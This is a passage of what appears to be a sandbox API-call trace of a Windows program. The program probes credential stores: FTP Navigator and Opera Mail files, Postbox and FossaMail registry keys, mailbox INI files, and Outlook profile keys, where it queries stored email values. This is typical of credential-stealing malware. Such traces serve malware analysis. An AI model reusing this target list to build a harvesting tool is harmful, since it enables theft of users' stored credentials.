[0184.940] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.940] GetProcessHeap () returned 0x840000 [0184.941] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.942] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x873a58, nSize=0x104 | out: lpDst="C:") returned 0x3 [0184.942] GetProcessHeap () returned 0x840000 [0184.942] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f78) returned 0x875288 [0184.944] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.944] wvsprintfW (in: param_1=0x875288, param_2="%s\\FTP Navigator\\Ftplist.txt", arglist=0x19f848 | out: param_1="C:\\FTP Navigator\\Ftplist.txt") returned 28 [0184.944] GetProcessHeap () returned 0x840000 [0184.944] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3c) returned 0x865c78 [0184.944] GetProcessHeap () returned 0x840000 [0184.944] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.945] PathFileExistsW (pszPath="C:\\FTP Navigator\\Ftplist.txt") returned 0 [0184.946] GetProcessHeap () returned 0x840000 [0184.946] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x865c78 | out: hHeap=0x840000) returned 1 [0184.946] GetProcessHeap () returned 0x840000 [0184.946] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.946] GetProcessHeap () returned 0x840000 [0184.946] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.947] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x873a58, nSize=0x104 | out: lpDst="C:") returned 0x3 [0184.947] GetProcessHeap () returned 0x840000 [0184.947] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f92) returned 0x87a228 [0184.947] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.949] wvsprintfW (in: param_1=0x87a228, param_2="%s\\Softwarenetz\\Mailing\\Daten\\mailing.vdt", arglist=0x19f7e8 | out: param_1="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 41 [0184.949] GetProcessHeap () returned 0x840000 [0184.949] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x56) returned 0x871d98 [0184.949] GetProcessHeap () returned 0x840000 [0184.949] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0184.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.950] PathFileExistsW (pszPath="C:\\Softwarenetz\\Mailing\\Daten\\mailing.vdt") returned 0 [0184.951] GetProcessHeap () returned 0x840000 [0184.951] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0184.951] GetProcessHeap () returned 0x840000 [0184.951] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.951] GetProcessHeap () returned 0x840000 [0184.951] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f82) returned 0x875288 [0184.952] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0184.952] wvsprintfW (in: param_1=0x875288, param_2="%s\\Opera Mail\\Opera Mail\\wand.dat", arglist=0x19f7f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 68 [0184.952] GetProcessHeap () returned 0x840000 [0184.952] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8c) returned 0x874a60 [0184.952] GetProcessHeap () returned 0x840000 [0184.952] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0184.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.953] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Mail\\Opera Mail\\wand.dat") returned 0 [0184.953] GetProcessHeap () returned 0x840000 [0184.953] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x874a60 | out: hHeap=0x840000) returned 1 [0184.953] GetProcessHeap () returned 0x840000 [0184.953] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0184.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.955] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Postbox\\Postbox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104) returned 0x2 [0184.955] GetProcessHeap () returned 0x840000 [0184.955] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.955] GetProcessHeap () returned 0x840000 [0184.955] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0184.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0184.956] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\FossaMail", pszValue="CurrentVersion", pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f84c*=0x104) returned 0x2 [0184.956] GetProcessHeap () returned 0x840000 [0184.956] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0184.956] GetProcessHeap () returned 0x840000 [0184.956] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0184.957] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0184.957] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0184.958] Sleep (dwMilliseconds=0xa) [0185.030] GetProcessHeap () returned 0x840000 [0185.030] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x875288 [0185.031] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.032] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s", arglist=0x19f59c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini") returned 44 [0185.032] GetProcessHeap () returned 0x840000 [0185.032] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x871d98 [0185.032] GetProcessHeap () returned 0x840000 [0185.032] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0185.032] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*Mailbox.ini", lpFindFileData=0x19f5b0 | out: lpFindFileData=0x19f5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x84a940, ftLastWriteTime.dwHighDateTime=0x84a940, nFileSizeHigh=0x865c50, nFileSizeLow=0x8660a8, dwReserved0=0x0, dwReserved1=0x19f60c, cFileName="ը眩", cAlternateFileName="뒭蕬͈읩꾷憫\x19䂑@")) returned 0xffffffff [0185.032] GetProcessHeap () returned 0x840000 [0185.033] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.033] GetProcessHeap () returned 0x840000 [0185.033] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.033] GetProcessHeap () returned 0x840000 [0185.033] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0185.033] GetProcessHeap () returned 0x840000 [0185.033] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x8720e8 [0185.033] GetProcessHeap () returned 0x840000 [0185.033] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bd8 [0185.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.034] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\WinChips\\UserAccounts", phkResult=0x871bd8 | out: phkResult=0x871bd8*=0x0) returned 0x2 [0185.034] GetProcessHeap () returned 0x840000 [0185.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bd8 | out: hHeap=0x840000) returned 1 [0185.034] GetProcessHeap () returned 0x840000 [0185.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.034] GetProcessHeap () returned 0x840000 [0185.034] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8720e8 | out: hHeap=0x840000) returned 1 [0185.034] GetProcessHeap () returned 0x840000 [0185.034] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0185.034] GetProcessHeap () returned 0x840000 [0185.034] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x8721f0 [0185.034] GetProcessHeap () returned 0x840000 [0185.034] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0185.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.041] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook", phkResult=0x871c58 | out: phkResult=0x871c58*=0x0) returned 0x2 [0185.042] GetProcessHeap () returned 0x840000 [0185.042] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0185.042] GetProcessHeap () returned 0x840000 [0185.042] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0185.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.043] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x871b08 | out: phkResult=0x871b08*=0x0) returned 0x2 [0185.043] GetProcessHeap () returned 0x840000 [0185.043] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0185.043] GetProcessHeap () returned 0x840000 [0185.043] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0185.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.044] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", phkResult=0x871b08 | out: phkResult=0x871b08*=0x234) returned 0x0 [0185.044] GetProcessHeap () returned 0x840000 [0185.044] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875288 [0185.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.045] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x0, pszName=0x875288, pcchName=0x19f824 | out: pszName="0a0d020000000000c000000000000046", pcchName=0x19f824) returned 0x0 [0185.046] GetProcessHeap () returned 0x840000 [0185.046] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c58 [0185.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.047] RegOpenKeyW (in: hKey=0x234, lpSubKey="0a0d020000000000c000000000000046", phkResult=0x871c58 | out: phkResult=0x871c58*=0x22c) returned 0x0 [0185.047] GetProcessHeap () returned 0x840000 [0185.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.048] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.048] GetProcessHeap () returned 0x840000 [0185.048] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.048] GetProcessHeap () returned 0x840000 [0185.048] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.048] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.049] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0185.049] GetProcessHeap () returned 0x840000 [0185.049] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.049] GetProcessHeap () returned 0x840000 [0185.049] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.049] GetProcessHeap () returned 0x840000 [0185.049] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0185.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.050] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x871b18 | out: phkResult=0x871b18*=0x220) returned 0x0 [0185.050] GetProcessHeap () returned 0x840000 [0185.050] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.051] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.051] GetProcessHeap () returned 0x840000 [0185.051] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.053] RegCloseKey (hKey=0x220) returned 0x0 [0185.053] GetProcessHeap () returned 0x840000 [0185.053] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0185.053] GetProcessHeap () returned 0x840000 [0185.053] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.054] RegCloseKey (hKey=0x22c) returned 0x0 [0185.054] GetProcessHeap () returned 0x840000 [0185.054] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c58 | out: hHeap=0x840000) returned 1 [0185.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.055] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x1, pszName=0x875288, pcchName=0x19f824 | out: pszName="13dbb0c8aa05101a9bb000aa002fc45a", pcchName=0x19f824) returned 0x0 [0185.055] GetProcessHeap () returned 0x840000 [0185.055] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0185.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.056] RegOpenKeyW (in: hKey=0x234, lpSubKey="13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x871b78 | out: phkResult=0x871b78*=0x22c) returned 0x0 [0185.056] GetProcessHeap () returned 0x840000 [0185.056] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.057] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.057] GetProcessHeap () returned 0x840000 [0185.057] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.057] GetProcessHeap () returned 0x840000 [0185.057] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.058] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.059] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a") returned 88 [0185.059] GetProcessHeap () returned 0x840000 [0185.059] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.059] GetProcessHeap () returned 0x840000 [0185.059] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.059] GetProcessHeap () returned 0x840000 [0185.059] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b88 [0185.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.060] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x871b88 | out: phkResult=0x871b88*=0x220) returned 0x0 [0185.060] GetProcessHeap () returned 0x840000 [0185.060] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.061] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.061] GetProcessHeap () returned 0x840000 [0185.061] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.063] RegCloseKey (hKey=0x220) returned 0x0 [0185.063] GetProcessHeap () returned 0x840000 [0185.063] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b88 | out: hHeap=0x840000) returned 1 [0185.063] GetProcessHeap () returned 0x840000 [0185.063] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.064] RegCloseKey (hKey=0x22c) returned 0x0 [0185.064] GetProcessHeap () returned 0x840000 [0185.064] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0185.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.065] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x2, pszName=0x875288, pcchName=0x19f824 | out: pszName="2db91c5fd8470d46b1a5bc5efab4cae7", pcchName=0x19f824) returned 0x0 [0185.065] GetProcessHeap () returned 0x840000 [0185.065] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c88 [0185.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.066] RegOpenKeyW (in: hKey=0x234, lpSubKey="2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x871c88 | out: phkResult=0x871c88*=0x22c) returned 0x0 [0185.066] GetProcessHeap () returned 0x840000 [0185.066] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.067] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.067] GetProcessHeap () returned 0x840000 [0185.067] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.067] GetProcessHeap () returned 0x840000 [0185.067] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.068] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.068] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7") returned 88 [0185.068] GetProcessHeap () returned 0x840000 [0185.068] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.068] GetProcessHeap () returned 0x840000 [0185.068] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.068] GetProcessHeap () returned 0x840000 [0185.068] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ba8 [0185.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.070] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\2db91c5fd8470d46b1a5bc5efab4cae7", phkResult=0x871ba8 | out: phkResult=0x871ba8*=0x220) returned 0x0 [0185.070] GetProcessHeap () returned 0x840000 [0185.070] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.070] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.071] GetProcessHeap () returned 0x840000 [0185.071] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.072] RegCloseKey (hKey=0x220) returned 0x0 [0185.072] GetProcessHeap () returned 0x840000 [0185.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ba8 | out: hHeap=0x840000) returned 1 [0185.072] GetProcessHeap () returned 0x840000 [0185.072] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.073] RegCloseKey (hKey=0x22c) returned 0x0 [0185.073] GetProcessHeap () returned 0x840000 [0185.073] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c88 | out: hHeap=0x840000) returned 1 [0185.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.074] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x3, pszName=0x875288, pcchName=0x19f824 | out: pszName="3517490d76624c419a828607e2a54604", pcchName=0x19f824) returned 0x0 [0185.074] GetProcessHeap () returned 0x840000 [0185.074] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c28 [0185.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.077] RegOpenKeyW (in: hKey=0x234, lpSubKey="3517490d76624c419a828607e2a54604", phkResult=0x871c28 | out: phkResult=0x871c28*=0x22c) returned 0x0 [0185.077] GetProcessHeap () returned 0x840000 [0185.077] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.078] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.078] GetProcessHeap () returned 0x840000 [0185.078] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.078] GetProcessHeap () returned 0x840000 [0185.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.078] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.079] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0185.079] GetProcessHeap () returned 0x840000 [0185.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.079] GetProcessHeap () returned 0x840000 [0185.079] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.079] GetProcessHeap () returned 0x840000 [0185.079] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0185.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.080] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x871b38 | out: phkResult=0x871b38*=0x220) returned 0x0 [0185.080] GetProcessHeap () returned 0x840000 [0185.080] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.081] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.081] GetProcessHeap () returned 0x840000 [0185.081] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.082] RegCloseKey (hKey=0x220) returned 0x0 [0185.082] GetProcessHeap () returned 0x840000 [0185.082] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0185.082] GetProcessHeap () returned 0x840000 [0185.082] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.083] RegCloseKey (hKey=0x22c) returned 0x0 [0185.083] GetProcessHeap () returned 0x840000 [0185.083] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c28 | out: hHeap=0x840000) returned 1 [0185.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.084] SHEnumKeyExW (in: hkey=0x234, dwIndex=0x4, pszName=0x875288, pcchName=0x19f824 | out: pszName="6c29d51f56390b45a924b3b787013a66", pcchName=0x19f824) returned 0x0 [0185.085] GetProcessHeap () returned 0x840000 [0185.085] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b98 [0185.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.086] RegOpenKeyW (in: hKey=0x234, lpSubKey="6c29d51f56390b45a924b3b787013a66", phkResult=0x871b98 | out: phkResult=0x871b98*=0x22c) returned 0x0 [0185.087] GetProcessHeap () returned 0x840000 [0185.087] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.087] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.087] GetProcessHeap () returned 0x840000 [0185.087] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.087] GetProcessHeap () returned 0x840000 [0185.087] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.088] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.089] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66") returned 88 [0185.089] GetProcessHeap () returned 0x840000 [0185.089] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.089] GetProcessHeap () returned 0x840000 [0185.089] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.089] GetProcessHeap () returned 0x840000 [0185.089] 